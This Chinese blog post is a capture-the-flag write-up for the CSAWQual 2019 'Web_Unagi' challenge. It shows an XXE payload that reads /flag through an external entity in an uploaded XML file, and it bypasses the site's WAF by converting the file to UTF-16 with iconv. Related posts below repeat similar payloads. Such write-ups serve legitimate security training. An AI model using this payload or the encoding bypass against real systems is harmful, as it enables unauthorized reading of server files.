[CSAWQual 2019]Web_Unagi xxe转码绕过waf

最新推荐文章于 2024-03-07 07:00:00 发布
最新推荐文章于 2024-03-07 07:00:00 发布
阅读量1.3k 收藏 1
点赞数
文章标签: linux 运维 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_54929891/article/details/124481254
版权

搜索给我们的信息

flag在flag下面,可能要用到文件读取或者系统命令

可以看到它叫我们上传一个xml文件,应该是xxe漏洞了

这里应该是提示我们会回显哪些属性,可以看到password没有显示出来

利用之前的XXE模板https://xz.aliyun.com/t/6887#toc-0 

<?xml version='1.0'?>
<!DOCTYPE users [
<!ENTITY xxe SYSTEM "file:///flag" >]>
<users>
    <user>
        <username>gg</username>
        <password>passwd1</password>
        <name>&xxe;</name>
        <email>alice@fakesite.com</email>  
        <group>CSAW2019</group>
        <intro>&xxe;</intro> </user>
    <user>
        <username>bob</username>
        <password>passwd2</password>
        <name> Bob</name>
        <email>bob@fakesite.com</email>  
        <group>CSAW2019</group>
        <intro>&xxe;</intro>
    </user>
</users>

直接上传

 

 发现有waf,只能上网查查有什么绕过方式了https://xz.aliyun.com/t/4059

大佬们用的是utf8编码转utf16的方式

利用iconv命令linux命令iconv_Linux中iconv命令的简介和使用方法_保瓶儿的博客-CSDN博客

【转载】Linux中大于符号的用法 - 百度文库

iconv -f utf8 -t utf16 1.xml>1231.xml
-f 指定待转换文件的编码
-t 制定目标编码
> 将1.xml文档转码后的结果保存到1231.xml文件中

 转码后发现前面多了些不可识别的字符,不管他了,直接上传 

 可以看到这个题目要注意的是如果我们把&xee放在Name处,会因为位置不够,导致flag输出不完整,因此多加小心

 

-栀蓝-
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
[CSAWQual 2019]Web_Unagi - 文件上传+XXE注入(XML编码绕过)
oZuoShen123的博客
10-10 1305
alice passwd1 Alice alice@fakesite.com CSAW2019 bob passwd2 Bob bob@fakesite.c
unagi:无的WordPress仪表板
03-04
Unagi是一个WordPress插件,可帮助您保持管理仪表板的清洁。 这是一个零配置的插件,只需激活并清除它。 Unagi-“这不是您的本领,而是您所拥有的。” 它是如何工作的? 它缓冲连接到admin_notices操作的所有输出...
[CSAWQual 2019]Web_Unagi
m0_62905261的博客
08-06 496
[CSAWQual 2019]Web_Unagi
buuctf_练[CSAWQual 2019]Web_Unagi
m0_66225311的博客
10-26 269
`XXE`漏洞利用,`xml`文件转换编码绕过`WAF`(UTF-8 --> UTF-16),`xml`文件格式的书写
[CSAWQual 2019]Web_Unagi ---不会编程的崽
最新发布
不会编程的崽的博客
03-07 530
xxe编码绕过
-Unagi-Ingress-Hackathon
02-14
【标题】"-Unagi-Ingress-Hackathon" 指的可能是一场以"Unagi Ingress"为主题的黑客马拉松活动,参与者可能需要利用技术解决与Ingress游戏相关的挑战。Ingress是一款由Niantic开发的增强现实游戏,玩家分为两个阵营...
unagi:现代浏览器上的RPG编辑器
05-04
a木 现代浏览器上的RPG编辑器 环境 到目前为止,仅在Mac OS X Chrome上对此进行了测试。 怎么跑 要求 脚步 运行./build.sh 运行go run testserver.go 访问
Python库 | unagi-0.1.3.dev3.tar.gz
05-24
资源分类:Python库 所属语言:Python 资源全名:unagi-0.1.3.dev3.tar.gz 资源来源:官方 安装方法:https://lanzao.blog.csdn.net/article/details/101784059
unagi:搜索和下载Hyper Suprime-Cam(HSC)斯巴鲁战略调查(SSP)中的数据
05-02
乌纳吉(ウナギ) 除了是世界上最美味的鱼的一个, unagi还可以帮助您通过浏览或了Hyper Suprime-CAM(HSC)斯巴鲁战略...2019/06/03:添加了对HSC PDR2的支持(需要更多测试) PDR2_DUD和PDR2_WIDE重新运行中的所有
[CSAWQual 2019]Web_Unagi XXE漏洞 [HarekazeCTF2019]Avatar Uploader 1 finfo_file和getimagesize
scrawman的博客
01-27 2845
[CSAWQual 2019]Web_Unagi 看提示有告诉你xml的格式 <?xml version='1.0'?> <!DOCTYPE users [ <!ENTITY xxe SYSTEM "file:///flag" >]> <users> <user> <username>bob</username> <password>passwd2</passwor
安恒暑期培训8-2wp
jojohacker的博客
09-27 258
[CSAWQual 2019]Web_Unagi 发现upload里面有个here的超链接,点进去打开源码发现 根据四个提示,可以猜测是要我们构造一个xml的文件然后将XXE编码转码为UTF-16来上传,所以构造一个payload <?xml version='1.0'?> <!DOCTYPE users [ <!ENTITY xxe SYSTEM "file:///flag" >]> <users> <user> <
网络安全笔记 -- XXE&XML(利用、检测、绕过
swy66的博客
09-24 1585
XXE(XML外部实体注入),利用、检测、绕过
XXE&XML】利用检测绕过
qq_41889600的博客
12-13 468
小迪安全xxe xml
WEB漏洞-XXE&XML之利用检测绕过全解(39)
san3144393495的博客
06-29 1515
除了这个形式,还有一个过滤,我们绕过思路就是采用协议玩法,换一种协议去执行想要的结果,或者采用外部引用,把核心代码写到外部东西上面去,DTD上面去实现绕过,还有一种编码把一些关键词进行编码,达到关键字的绕过,根据具体情况选出不同的方案。判定这个漏洞存在之后,我们该如何去利用,分为两种,第一种是输出形式,利用的结果显示,分为两种情况,一种情况是有回显,一种是回显;xml:xml被设计成传输和储存数据,XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素,其焦点是数据的内容。
学习日志9:XXE+php://filter绕过WAF读内网文件
m0_37622973的博客
09-08 1387
摘自freebuf 出处:https://www.freebuf.com/vuls/211822.html 基础知识: 1.php://filter是php中独有的一个协议,可以作为一个中间流来处理其他流,可以进行任意文件的读取;使用不同的参数可以达到不同的目的和效果:其中resource=<要过滤的数据流>,指定了要筛选过滤的数据流 2.php的data://text/plain;b...
BUUCTF:[CSAWQual 2019]Web_Unagi
末初的CSDN博客
04-06 1907
XXE编码转换为UTF-16绕过 2.xml <?xml version='1.0'?> <!DOCTYPE users [ <!ENTITY xxe SYSTEM "file:///flag" >]> <users> <user> <username>bob</username> ...
BUUCTF:[CSAWQual 2019]Web_Unagi
../../../../../../../
06-08 1017
打开界面 看看其他有什么内容: 来看看格式事例: 从信息提示我们可以知道要通过编写xml文件上传 即通过XXE编码转换成utf-16编码绕过 我们可以利用vim编辑xml文件(取名为2.xml) 构造payload如下: <?xml version='1.0'?> <!DOCTYPE users [ <!ENTITY xxe SYSTEM "file:///flag" >]> <users> <user> <
[CSAWQual 2019]Unagi
07-27
- *1* [[CSAWQual 2019]Web_Unagi xxe转码绕过waf](https://blog.csdn.net/qq_54929891/article/details/124481254)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值